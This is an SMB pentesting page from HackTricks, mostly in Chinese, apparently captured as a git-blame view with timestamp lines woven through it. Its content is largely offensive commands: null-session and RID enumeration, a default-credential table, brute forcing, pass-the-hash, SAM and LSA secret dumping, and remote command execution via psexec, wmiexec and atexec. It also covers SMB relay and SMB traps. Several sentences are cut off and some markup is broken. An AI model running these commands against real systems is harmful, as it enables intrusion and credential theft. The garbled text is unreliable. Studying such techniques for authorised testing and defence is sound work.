2024-07-19 11:24:45 +00:00
# 139,445 - Pentesting SMB
2022-04-28 16:01:33 +00:00
2024-07-19 11:24:45 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Learn & practice GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 11:24:45 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 11:24:45 +00:00
< summary > Support HackTricks< / summary >
2024-01-02 22:21:01 +00:00
2024-07-19 11:24:45 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 11:24:45 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-07-19 11:24:45 +00:00
## **Port 139**
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
_**网络基本输入输出系统**_** (NetBIOS)** 是一种软件协议,旨在使局域网 (LAN) 内的应用程序、个人电脑和桌面能够与网络硬件交互,并**促进数据在网络中的传输**。通过其 NetBIOS 名称(长度可达 16 个字符,通常与计算机名称不同),可以识别和定位在 NetBIOS 网络上运行的软件应用程序。当一个应用程序(充当客户端)发出命令“呼叫”另一个应用程序(充当服务器)时,两个应用程序之间的 NetBIOS 会话通过**TCP 端口 139**启动。
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
2024-07-19 11:24:45 +00:00
## Port 445
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
从技术上讲,端口 139 被称为“NBT over IP”, **SMB** 代表“**服务器消息块**”,现代也被称为 **通用互联网文件系统 (CIFS)** 。作为一种应用层网络协议,
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
例如,在 Windows 的上下文中,强调 SMB 可以直接通过 TCP/IP 操作,消除了通过端口 445 使用 NetBIOS over TCP/IP 的必要性。相反,在不同的系统上,观察到使用端口 139,
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
2022-10-02 19:15:35 +00:00
### SMB
2024-07-19 11:24:45 +00:00
**服务器消息块 (SMB)** 协议在 **客户端-服务器** 模型中运行,旨在调节对 **文件** 、目录和其他网络资源(如打印机和路由器)的 **访问** 。主要用于 **Windows** 操作系统系列, **Linux** 和 Unix 系统上实现,从而通过 SMB 促进跨平台通信。
2022-10-02 19:15:35 +00:00
2024-07-19 11:24:45 +00:00
共享,代表 **本地文件系统的任意部分** ,可以由 SMB 服务器提供,使得层次结构对客户端部分 **独立** 于服务器的实际结构可见。**访问控制列表 (ACLs)** 定义了 **访问权限** ,允许对用户权限进行 **细粒度控制** ,包括 ** `执行` **、**`读取`** 和 ** `完全访问` ** 等属性。这些权限可以根据共享分配给单个用户或组,并且与服务器上设置的本地权限不同。
2022-10-02 19:15:35 +00:00
2024-07-19 11:24:45 +00:00
### IPC$ Share
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
可以通过匿名空会话访问 IPC$ 共享,从而与通过命名管道暴露的服务进行交互。实用工具 `enum4linux` 对此非常有用。正确使用时,它可以获取:
2020-07-15 15:43:14 +00:00
2024-02-23 16:42:48 +00:00
* 操作系统信息
* 父域的详细信息
* 本地用户和组的汇编
2024-07-19 11:24:45 +00:00
* 可用 SMB 共享的信息
2024-02-23 16:42:48 +00:00
* 有效的系统安全策略
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
此功能对于网络管理员和安全专业人员评估网络上 SMB (服务器消息块) 服务的安全态势至关重要。`enum4linux` 提供了目标系统 SMB 环境的全面视图,这对于识别潜在漏洞和确保 SMB 服务得到适当保护是必不可少的。
2024-02-05 02:56:36 +00:00
```bash
enum4linux -a target_ip
```
2024-07-19 11:24:45 +00:00
上述命令是如何使用 `enum4linux` 对指定的 `target_ip` 进行完整枚举的示例。
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
## 什么是 NTLM
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
如果你不知道什么是 NTLM, , **NTLM** 的内容非常有趣,其中解释了 **这个协议是如何工作的以及你如何利用它:**
2020-07-15 15:43:14 +00:00
2022-10-04 23:49:59 +00:00
{% content-ref url="../windows-hardening/ntlm/" %}
[ntlm ](../windows-hardening/ntlm/ )
{% endcontent-ref %}
2023-08-03 19:12:22 +00:00
## **服务器枚举**
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
### **扫描** 网络以搜索主机:
2020-07-15 15:43:14 +00:00
```bash
nbtscan -r 192.168.0.1/24
```
2023-08-27 20:13:14 +00:00
### SMB 服务器版本
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
要查找可能针对 SMB 版本的漏洞,了解正在使用的版本非常重要。如果此信息未在其他使用的工具中出现,您可以:
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
* 使用 **MSF** 辅助模块 \_**auxiliary/scanner/smb/smb\_version**
* 或者这个脚本:
2020-07-15 15:43:14 +00:00
```bash
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" & & exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" & & sleep .1
```
2024-07-19 11:24:45 +00:00
### **搜索漏洞**
2020-07-15 15:43:14 +00:00
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
2024-07-19 11:24:45 +00:00
### **可能的** 凭据
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
| **用户名** | **常见密码** |
2024-02-23 16:42:48 +00:00
| -------------------- | ----------------------------------------- |
2024-07-19 11:24:45 +00:00
| _(空白)_ | _(空白)_ |
| guest | _(空白)_ |
2023-08-03 19:12:22 +00:00
| Administrator, admin | _(空白)_ , password, administrator, admin |
2024-02-23 16:42:48 +00:00
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
2020-07-15 15:43:14 +00:00
2023-12-26 21:49:09 +00:00
### 暴力破解
2024-07-19 11:24:45 +00:00
* [**SMB 暴力破解** ](../generic-methodologies-and-resources/brute-force.md#smb )
2023-12-26 21:49:09 +00:00
2024-07-19 11:24:45 +00:00
### SMB 环境信息
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 获取信息
2020-07-15 15:43:14 +00:00
```bash
#Dump interesting information
enum4linux -a [-u "< username > " -p "< passwd > "] < IP >
2021-06-16 12:07:22 +00:00
enum4linux-ng -A [-u "< username > " -p "< passwd > "] < IP >
2020-07-15 15:43:14 +00:00
nmap --script "safe or smb-enum-*" -p 445 < IP >
#Connect to the rpc
rpcclient -U "" -N < IP > #No creds
2020-12-22 11:59:42 +00:00
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
2022-11-26 22:36:18 +00:00
rpcclient -U "username%passwd" < IP > #With creds
2020-07-15 15:43:14 +00:00
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]< targetName or address >
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]< targetName or address >
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]< targetName or address >
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]< targetName or address >
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]< targetName or address >
```
2024-07-19 11:24:45 +00:00
### 枚举用户、组和登录用户
2023-08-03 19:12:22 +00:00
2024-07-19 11:24:45 +00:00
这些信息应该已经从 enum4linux 和 enum4linux-ng 收集。
2023-08-03 19:12:22 +00:00
```bash
2022-10-04 23:49:59 +00:00
crackmapexec smb 10.10.10.10 --users [-u < username > -p < password > ]
crackmapexec smb 10.10.10.10 --groups [-u < username > -p < password > ]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u < username > -p < password > ]
2020-07-15 15:43:14 +00:00
2022-10-04 21:36:29 +00:00
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(& (objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
2020-07-15 15:43:14 +00:00
2022-10-04 21:36:29 +00:00
rpcclient -U "" -N 10.10.10.10
enumdomusers
2022-10-04 23:49:59 +00:00
enumdomgroups
2023-08-27 20:13:14 +00:00
```
### 枚举本地用户
2023-12-26 21:49:09 +00:00
2023-08-27 20:13:14 +00:00
[Impacket ](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py )
```bash
2022-10-04 23:49:59 +00:00
lookupsid.py -no-pass hostname.local
2023-08-27 20:13:14 +00:00
```
2024-07-19 11:24:45 +00:00
Oneliner
2023-08-27 20:13:14 +00:00
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
### Metasploit - 枚举本地用户
```bash
2022-10-04 23:49:59 +00:00
use auxiliary/scanner/smb/smb_lookupsid
2023-12-26 21:49:09 +00:00
set rhosts hostname.local
2022-10-04 23:49:59 +00:00
run
2022-10-04 21:36:29 +00:00
```
2023-12-26 21:49:09 +00:00
### **枚举 LSARPC 和 SAMR rpcclient**
2020-07-15 15:43:14 +00:00
2022-10-04 23:18:19 +00:00
{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %}
[rpcclient-enumeration.md ](pentesting-smb/rpcclient-enumeration.md )
2022-10-04 21:36:29 +00:00
{% endcontent-ref %}
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
### 从 Linux 进行 GUI 连接
2021-02-02 09:11:43 +00:00
2024-02-05 02:56:36 +00:00
#### 在终端中:
2021-02-02 09:11:43 +00:00
`xdg-open smb://cascade.htb/`
2024-07-19 11:24:45 +00:00
#### 在文件浏览器窗口中(
2021-02-02 09:11:43 +00:00
`smb://friendzone.htb/general/`
2023-12-26 21:49:09 +00:00
## 共享文件夹枚举
2022-10-04 23:49:59 +00:00
2023-12-26 21:49:09 +00:00
### 列出共享文件夹
2023-08-03 19:12:22 +00:00
2024-07-19 11:24:45 +00:00
始终建议查看您是否可以访问任何内容,如果您没有凭据,请尝试使用 **null** **凭据/访客用户** 。
2023-08-27 20:13:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
smbclient --no-pass -L //< IP > # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //< IP > #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
2023-08-03 19:12:22 +00:00
2023-12-26 21:49:09 +00:00
smbmap -H < IP > [-P < PORT > ] #Null user
smbmap -u "username" -p "password" -H < IP > [-P < PORT > ] #Creds
smbmap -u "username" -p "< NT > :< LM > " -H < IP > [-P < PORT > ] #Pass -the-Hash
smbmap -R -u "username" -p "password" -H < IP > [-P < PORT > ] #Recursive list
2023-08-03 19:12:22 +00:00
2023-12-26 21:49:09 +00:00
crackmapexec smb < IP > -u '' -p '' --shares #Null user
crackmapexec smb < IP > -u 'username' -p 'password' --shares #Guest user
crackmapexec smb < IP > -u 'username' -H '< HASH > ' --shares #Guest user
2023-08-03 19:12:22 +00:00
```
2023-12-26 21:49:09 +00:00
### **连接/列出共享文件夹**
2020-07-15 15:43:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
#Connect using smbclient
2020-07-15 15:43:14 +00:00
smbclient --no-pass //< IP > /< Folder >
2023-12-26 21:49:09 +00:00
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //< IP > #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
2020-07-15 15:43:14 +00:00
2023-12-26 21:49:09 +00:00
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H < IP > [-P < PORT > ] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H < IP > [-P < PORT > ] # Non-Recursive list
smbmap -u "username" -p "< NT > :< LM > " [-r/-R] [Folder] -H < IP > [-P < PORT > ] #Pass -the-Hash
2020-07-15 15:43:14 +00:00
```
2024-07-19 11:24:45 +00:00
### **手动枚举 Windows 共享并连接到它们**
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
可能您被限制显示主机的任何共享,当您尝试列出它们时,似乎没有任何共享可供连接。因此,尝试手动连接到共享可能是值得的。要手动枚举共享,您可能想要查找像 NT\_STATUS\_ACCESS\_DENIED 和 NT\_STATUS\_BAD\_NETWORK\_NAME 这样的响应,当使用有效会话(例如,空会话或有效凭据)时。这些可能表明共享是否存在以及您是否没有访问权限,或者共享根本不存在。
2023-08-27 20:13:14 +00:00
2024-07-19 11:24:45 +00:00
Windows 目标的常见共享名称包括
2020-08-28 15:29:16 +00:00
* C$
* D$
* ADMIN$
* IPC$
* PRINT$
* FAX$
* SYSVOL
* NETLOGON
2024-07-19 11:24:45 +00:00
(来自 _**网络安全评估 第3版**_ 的常见共享名称)
2023-08-27 20:13:14 +00:00
2024-02-05 02:56:36 +00:00
您可以尝试使用以下命令连接到它们
2023-08-27 20:13:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
smbclient -U '%' -N \\\\< IP > \\< SHARE > # null session to connect to a windows share
smbclient -U '< USER > ' \\\\< IP > \\< SHARE > # authenticated session to connect to a windows share (you will be prompted for a password)
2023-08-27 20:13:14 +00:00
```
2024-07-19 11:24:45 +00:00
或此脚本(使用空会话)
2020-08-28 15:29:16 +00:00
```bash
#/bin/bash
2020-08-28 16:23:05 +00:00
ip='< TARGET-IP-HERE > '
2020-08-28 15:29:16 +00:00
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in ${shares[*]}; do
2023-08-03 19:12:22 +00:00
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
2020-08-28 15:29:16 +00:00
2023-08-03 19:12:22 +00:00
if [[ -z $output ]]; then
2023-12-26 21:49:09 +00:00
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
2023-08-03 19:12:22 +00:00
else
2023-12-26 21:49:09 +00:00
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
2023-08-03 19:12:22 +00:00
fi
2020-08-28 15:29:16 +00:00
done
```
2024-07-19 11:24:45 +00:00
示例
2023-08-27 20:13:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
2024-02-05 02:56:36 +00:00
### **从Windows枚举共享/无需第三方工具**
2023-12-26 21:49:09 +00:00
PowerShell
```powershell
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "< computer name or session object > "
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
```
2024-07-19 11:24:45 +00:00
CMD 控制台
2023-12-26 21:49:09 +00:00
```shell
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\< ip > /all
2023-08-27 20:13:14 +00:00
```
2024-07-19 11:24:45 +00:00
MMC 快捷工具(图形)
2023-12-26 21:49:09 +00:00
```shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
2020-07-15 15:43:14 +00:00
```
2024-07-19 11:24:45 +00:00
explorer.exe (图形界面),输入 `\\<ip>\` 以查看可用的非隐藏共享。
2020-07-15 15:43:14 +00:00
2023-12-26 21:49:09 +00:00
### 挂载共享文件夹
2023-08-03 19:12:22 +00:00
```bash
2023-12-26 21:49:09 +00:00
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
2023-08-03 19:12:22 +00:00
```
2023-12-26 21:49:09 +00:00
### **下载文件**
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
阅读前面的部分以了解如何使用凭据/Pass-the-Hash 进行连接。
2020-07-15 15:43:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
#Search a file and download
sudo smbmap -R Folder -H < IP > -A < FileName > -q # Search the file in recursive mode and download it inside /usr/share/smbmap
2020-07-15 15:43:14 +00:00
```
```bash
2023-12-26 21:49:09 +00:00
#Download all
2023-11-05 15:30:34 +00:00
smbclient //< IP > /< share >
2020-09-03 15:27:18 +00:00
> mask ""
2020-09-04 19:43:20 +00:00
> recurse
> prompt
2020-07-15 15:43:14 +00:00
> mget *
2023-12-26 21:49:09 +00:00
#Download everything to current directory
2020-07-15 15:43:14 +00:00
```
2024-07-19 11:24:45 +00:00
Commands:
* mask: 指定用于过滤目录中文件的掩码(例如,""表示所有文件)
* recurse: 切换递归开关(默认:关闭)
* prompt: 切换文件名提示开关(默认:开启)
* mget: 将与掩码匹配的所有文件从主机复制到客户端机器
(_来自smbclient的手册信息_)
### Domain Shared Folders Search
2020-12-22 15:40:31 +00:00
2024-02-05 02:56:36 +00:00
* [**Snaffler** ](https://github.com/SnaffCon/Snaffler )\*\*\*\*
2022-10-05 00:11:28 +00:00
```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```
2024-07-19 11:24:45 +00:00
* [**CrackMapExec** ](https://wiki.porchetta.industries/smb-protocol/spidering-shares ) 爬虫。
2023-08-03 19:12:22 +00:00
* `-M spider_plus [--share <share_name>]`
* `--pattern txt`
2020-12-22 15:40:31 +00:00
```bash
2023-12-26 21:49:09 +00:00
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
2020-12-22 15:40:31 +00:00
```
2024-07-19 11:24:45 +00:00
特别有趣的共享文件是名为 ** `Registry.xml` ** 的文件,因为它们 **可能包含密码** ,用于通过组策略配置的 **autologon** 用户。或者 ** `web.config` ** 文件,因为它们包含凭据。
2022-10-05 23:14:39 +00:00
{% hint style="info" %}
2024-07-19 11:24:45 +00:00
**SYSVOL 共享** 对域中的所有经过身份验证的用户 **可读** 。在这里,您可能会 **找到** 许多不同的批处理、VBScript 和 PowerShell **脚本** 。\
您应该 **检查** 其中的 **脚本** ,因为您可能会 **发现** 敏感信息,例如 **密码** 。
2022-10-05 23:14:39 +00:00
{% endhint %}
2023-12-26 21:49:09 +00:00
## 读取注册表
2021-05-10 16:48:27 +00:00
2024-07-19 11:24:45 +00:00
您可能能够使用一些发现的凭据 **读取注册表** 。Impacket ** `reg.py` ** 允许您尝试:
2022-10-04 23:49:59 +00:00
```bash
2023-08-27 20:13:14 +00:00
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```
2024-07-19 11:24:45 +00:00
## Post Exploitation
2023-08-27 20:13:14 +00:00
2024-07-19 11:24:45 +00:00
**Samba** 服务器的 **默认配置** 通常位于 `/etc/samba/smb.conf` ,可能包含一些 **危险配置** :
2023-08-27 20:13:14 +00:00
2024-07-19 11:24:45 +00:00
| **设置** | **描述** |
| --------------------------- | --------------------------------------------------------------- |
| `browseable = yes` | 允许列出当前共享中的可用共享? |
| `read only = no` | 禁止创建和修改文件? |
| `writable = yes` | 允许用户创建和修改文件? |
| `guest ok = yes` | 允许在不使用密码的情况下连接到服务? |
| `enable privileges = yes` | 尊重分配给特定 SID 的权限? |
| `create mask = 0777` | 新创建的文件必须分配什么权限? |
| `directory mask = 0777` | 新创建的目录必须分配什么权限? |
| `logon script = script.sh` | 用户登录时需要执行哪个脚本? |
| `magic script = script.sh` | 脚本关闭时应执行哪个脚本? |
| `magic output = script.out` | 魔法脚本的输出需要存储在哪里? |
2024-02-23 16:42:48 +00:00
2024-07-19 11:24:45 +00:00
命令 `smbstatus` 提供有关 **服务器** 和 **谁已连接** 的信息。
2023-12-26 21:49:09 +00:00
2024-07-19 11:24:45 +00:00
## Authenticate using Kerberos
2023-12-26 21:49:09 +00:00
2024-07-19 11:24:45 +00:00
您可以使用工具 **smbclient** 和 **rpcclient** 进行 **kerberos** 认证:
2020-07-15 15:43:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
2023-08-27 20:13:14 +00:00
```
2023-12-26 21:49:09 +00:00
## **执行命令**
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
### **crackmapexec**
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
crackmapexec 可以通过 **mmcexec, smbexec, atexec, wmiexec** 中的任何一种方法 **执行命令** ,其中 **wmiexec** 是 **默认** 方法。您可以使用参数 `--exec-method` 指定您希望使用的选项:
2020-07-15 15:43:14 +00:00
```bash
apt-get install crackmapexec
2023-08-27 20:13:14 +00:00
2023-12-26 21:49:09 +00:00
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H < NTHASH > -x whoami #Pass -the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
2023-08-27 20:13:14 +00:00
2023-12-26 21:49:09 +00:00
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --rid-brute #RID brute
2023-08-27 20:13:14 +00:00
2023-12-26 21:49:09 +00:00
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -H < HASH > #Pass -The-Hash
2023-08-27 20:13:14 +00:00
```
2022-10-04 23:18:19 +00:00
### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
这两个选项将**在受害者机器上创建一个新服务**(通过 SMB 使用 _\pipe\svcctl_ ),并利用它来**执行某些操作**( **smbexec** 将指向 **cmd.exe/powershell.exe** 并将有效载荷作为参数放入 --**无文件技术-**-)。\
有关 [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md ) 和 [**smbexec** ](../windows-hardening/ntlm/smbexec.md ) 的**更多信息**。\
在 **kali** 中,它位于 /usr/share/doc/python3-impacket/examples/
2020-07-15 15:43:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
#If no password is provided, it will be prompted
2020-07-15 15:43:14 +00:00
./psexec.py [[domain/]username[:password]@]< targetName or address >
./psexec.py -hashes < LM:NT > administrator@10.10.10.103 #Pass -the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
2023-12-26 21:49:09 +00:00
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
2020-07-15 15:43:14 +00:00
```
2024-07-19 11:24:45 +00:00
使用 **参数** `-k` ,您可以使用 **kerberos** 进行身份验证,而不是 **NTLM** 。
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
### [wmiexec](../windows-hardening/ntlm/wmiexec.md)/dcomexec
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
通过 **端口 135** 隐秘地执行命令 shell, ,
在 **kali** 中,它位于 /usr/share/doc/python3-impacket/examples/
2020-07-15 15:43:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]< targetName or address > #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass -the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
2020-07-15 15:43:14 +00:00
```
2024-07-19 11:24:45 +00:00
使用 **parameter** `-k` 你可以使用 **kerberos** 进行身份验证,而不是 **NTLM**
2020-07-15 15:43:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
#If no password is provided, it will be prompted
2020-07-15 15:43:14 +00:00
./dcomexec.py [[domain/]username[:password]@]< targetName or address >
./dcomexec.py -hashes < LM:NT > administrator@10.10.10.103 #Pass -the-Hash
2023-12-26 21:49:09 +00:00
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
2020-07-15 15:43:14 +00:00
```
2022-10-04 23:18:19 +00:00
### [AtExec](../windows-hardening/ntlm/atexec.md)
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
通过任务调度程序执行命令(使用 _\pipe\atsvc_ 通过 SMB)
在 **kali** 中位于 /usr/share/doc/python3-impacket/examples/
2020-07-15 15:43:14 +00:00
```bash
./atexec.py [[domain/]username[:password]@]< targetName or address > "command"
./atexec.py -hashes < LM:NT > administrator@10.10.10.175 "whoami"
```
2024-02-05 02:56:36 +00:00
## Impacket 参考
2020-07-15 15:43:14 +00:00
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/ ](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/ )
2023-12-26 21:49:09 +00:00
## **暴力破解用户凭证**
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
**这不推荐,如果超过允许的最大尝试次数,您可能会锁定账户**
2020-07-15 15:43:14 +00:00
```bash
nmap --script smb-brute -p 445 < IP >
2023-12-26 21:49:09 +00:00
ridenum.py < IP > 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
2023-08-27 20:13:14 +00:00
```
2024-07-19 11:24:45 +00:00
## SMB relay attack
2023-08-27 20:13:14 +00:00
2024-07-19 11:24:45 +00:00
此攻击使用 Responder 工具包来 **捕获内部网络上的 SMB 认证会话** ,并将其 **中继** 到 **目标机器** 。如果认证 **会话成功** ,它将自动将您带入 **系统** **shell** 。\
[**有关此攻击的更多信息请点击这里。** ](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md )
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
## SMB-Trap
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
当页面尝试通过 SMB 访问某些内容时, `img src="\\10.10.10.10\path\image.jpg"`
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
这发生在以下函数中:
2020-07-15 15:43:14 +00:00
2024-02-23 16:42:48 +00:00
* URLDownloadToFile
* URLDownloadToCache
* URLOpenStream
* URLOpenBlockingStream
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
这些函数被一些浏览器和工具(如 Skype)
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
.png>)
2020-07-15 15:43:14 +00:00
2024-07-19 11:24:45 +00:00
### SMBTrap using MitMf
2022-09-15 17:28:33 +00:00
